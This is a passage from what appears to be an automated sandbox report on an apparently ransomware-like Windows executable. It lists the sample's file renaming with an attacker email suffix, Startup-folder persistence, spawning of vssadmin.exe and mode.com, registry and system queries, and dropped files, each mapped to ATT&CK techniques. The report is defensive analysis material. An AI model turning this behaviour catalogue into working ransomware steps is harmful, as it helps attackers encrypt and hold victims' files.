DC\\Reader\\AcroApp\\ENU\\OptimizePDF_R_RHP.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Pages_R_RHP.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\Acrofx32.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\ADelRCP.exe.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AdobeCollabSync.exe.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\Locale\\en_US\\stopwords.ENU.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\logsession.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\pe.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\AcroForm\\PMP\\QRCode.pmp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\DropboxStorage.api.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\IA32.api.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.mpp.id-085CDA53.[vijurytos@tuta.io].V\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\"\n \"cmd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\mode.com\")\n \"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\vssadmin.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"C4816EDACF346F207E7F3FDD5F519FEFD2465D21E08CAD1936A1BDE32D7FAEA0\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"mode.com\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"HncXsecCore8.dll.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"A3DUtils.dll.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe]- [targetUID: 00000000-00006140]\n \"Statement.xlsx.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"autoit.php.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A614A7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Job1_18.drt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"BacG4_20.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"Kind2_08.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"Monthly Calendar - Land.hcdt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"MODE.COM.67A60B94.bin\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"TaleF_05.drt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"CAni1_02.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"COthe_05.drt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"ui-strings.js.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"Offi1_19.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"HM07_01.png.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"HeaderConstants.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_GUICtrlRebar_GetBKColor.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_GUICtrlRichEdit_HideSelection.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_GUICtrlHeader_GetItemRectEx.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_WinAPI_GetBinaryType.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"ChrtA_11.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"ui-strings.js.id-085CDA53._vijurytos@tuta.io_.V\" has type \"COM executable for MS-DOS\"- [targetUID: N/A]\n \"IFood_12.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_ArrayTrim.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"RougR_04.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_WinAPI_EqualMemory.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_WinAPI_GetFileSizeOnDisk.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-49", "type": 8, "name": "Drops ASP/PHP html files", "description": "\"autoit.php.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\dotnet48.exe\" to \"C:\\dotnet48.exe.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.msi\" to \"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.msi\" to \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.msi\" to \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlkLR.cab\" to \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlkLR.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi\" to \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab\" to \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab\" to \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi\" to \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OnoteLR.cab\" to \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OnoteLR.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeLR.cab\" to \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeLR.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab\" to \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\icudt.dll\" to \"%PROGRAMFILES%\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\icudt.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe\" to \"%PROGRAMFILES%\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.dll\" to \"%PROGRAMFILES%\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AGM.dll\" to \"%PROGRAMFILES%\\Adobe\\Acrobat Reader DC\\Reader\\AGM.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\CoolType.dll\" to \"%PROGRAMFILES%\\Adobe\\Acrobat Reader DC\\Reader\\CoolType.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api\" to \"%PROGRAMFILES%\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" renamed original file\"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\SendMail.api\" to \"%PROGRAMFILES%\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\SendMail.api.id-085CDA53.[vijurytos@tuta.io].V\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"vssadmin.exe\" at 00000000-00004048-00000105-2628436", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-625926\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-649770\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-651763\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-653792", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"OpenMutexW\" with parameter \"Global\\syncronize_741U9BA\" - (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"OpenMutexW\" with parameter \"Global\\syncronize_741U9BU\" - (UID: 00000000-00006140)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-625926\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-649770\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-651763\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" queries volume information of \"C:\\\" at 00000000-00006140-0000010C-653792", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006140)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000a00901d0a008b1d0a000000000000000000000007000000000104da2f000000000068e72f0095e16f7727230700feffffff435c737750597377aa000000b80000008a1d0a00881d0a008cdb2f00c4df2f0000000000000000000000000000000000000000000000000000000000000000001c5c727760d88375ffffffff170000003cdb2f0024000000030000002ce02f0058e52f00c4df2f008600000068db2f0096ed7377b21d0a00a06a4975860000008cdb2f00c4df2f000000000086008800a06a49758cdb2f00916c4975b21d0a00a06a4975a06a4975fcdf2f0002020000 (UID: 00000000-00005932)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006140)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LookupAccountSidW\" with param Name SYSTEM (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"LookupAccountSidW\" with param Name NETWORK SERVICE (UID: 00000000-00006140)\n \"vssadmin.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004048)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"cmd.exe\" called \"IsWow64Process\" with parameter \"5932\" - (UID: 00000000-00005932)\n \"vssadmin.exe\" called \"IsWow64Process\" with parameter 